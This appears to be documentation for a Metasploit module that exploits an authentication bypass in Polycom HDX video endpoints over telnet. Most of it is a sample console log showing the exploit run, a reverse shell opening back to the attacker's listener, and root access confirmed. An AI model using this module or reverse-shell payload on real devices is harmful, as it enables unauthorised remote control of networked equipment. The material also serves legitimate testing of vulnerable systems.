This module exploits the Polycom HDX Video End Points with software <= 3.0.5. It was tested on a Polycom HDX 7000 running software version 3.0.3. Telnet port 23 should be accessible, as it is with the factory default configuration.
A successful check of the exploit will look like this:
msf exploit(psh_auth_bypass) > use exploit/unix/misc/psh_auth_bypass msf exploit(psh_auth_bypass) > run [*] Started reverse double SSL handler on 192.168.1.120:4444 [*] 192.168.1.155:23 - Starting Authentication bypass with 6 threads with 100 max connections [+] 192.168.1.155:23 - 192.168.1.155:23 Successfully exploited the authentication bypass flaw [+] 192.168.1.155:23 - Sending payload of 178 bytes to 192.168.1.155:40186... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo xInxktvgUmm7hPyh; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "xInxktvgUmm7hPyh\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.1.120:4444 -> 192.168.1.155:37728) at 2016-08-01 13:49:06 -0500 [*] 192.168.1.155:23 - Shutting down payload stager listener... whoami root uname -a Linux polycom.lan 22.214.171.124-rt17.p2.25 #1 PREEMPT RT Wed Aug 3 14:08:40 CDT 2011 ppc unknown